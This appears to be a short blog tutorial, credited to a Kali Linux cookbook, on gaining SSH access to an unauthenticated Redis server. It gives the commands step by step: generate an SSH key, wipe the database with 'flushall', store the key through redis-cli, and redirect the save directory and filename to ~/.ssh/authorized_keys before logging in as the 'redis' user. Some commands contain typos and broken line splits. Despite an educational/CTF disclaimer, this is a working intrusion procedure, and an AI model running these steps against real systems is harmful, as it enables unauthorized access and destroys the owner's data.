In this article, we are going to take access to the Redis installation as the user “redis”
that is running without authentication.
Disclaimer
All the stunts/hack perform in this aritcle is only for educational purposes and for ctf's. This article and the author is no way responsible for any hack or misuse of the information.
Disclaimer
All the stunts/hack perform in this aritcle is only for educational purposes and for ctf's. This article and the author is no way responsible for any hack or misuse of the information.
Prerequisite:
Redis tool should be installed in your
system(Linux). If not install it by the following command:
sudo apt-get install redis-tools
Now fire up your terminal and follow
the steps:
1. Generate your ssh key using the
following command.
ssh-keygen -t rsa
 |
| ssh key generation. |
2. Now add some random data before and
after the key and store the result in the new file
‘key.txt’(your choice). Use the following command.
(echo -e “\n\n”; cat
id_rsa.pub; echo -e “\n\n”) > key.txt
redis-cli -h x.x.x.x -p 6379
flushall
cat key.txt | redis-cli -h x.x.x.x
-p 6379 -x set bb
4. When all the above steps are done
without error. We need top copy the uploaded key to .ssh folder and
then change the name of the file to “authorized keys”. This can
be done these command:
4.1. connect to the host.
redis-cli -h x.x.x.x
4.2 check the current folder with this
config get dir
4.3 change the dir to .ssh
config set dir / path /
to / .ssh /
4.4 change the name
of the file to “authorized_keys” and then save.
config
set dbfilename “auhorized_keys”/
5. All done now try to ssh to the
server. We see that we are “redis” user.
SOURCE: KALI LINUX: AN ETHICAL HACKER'S COOKBOOK
Comments
Post a Comment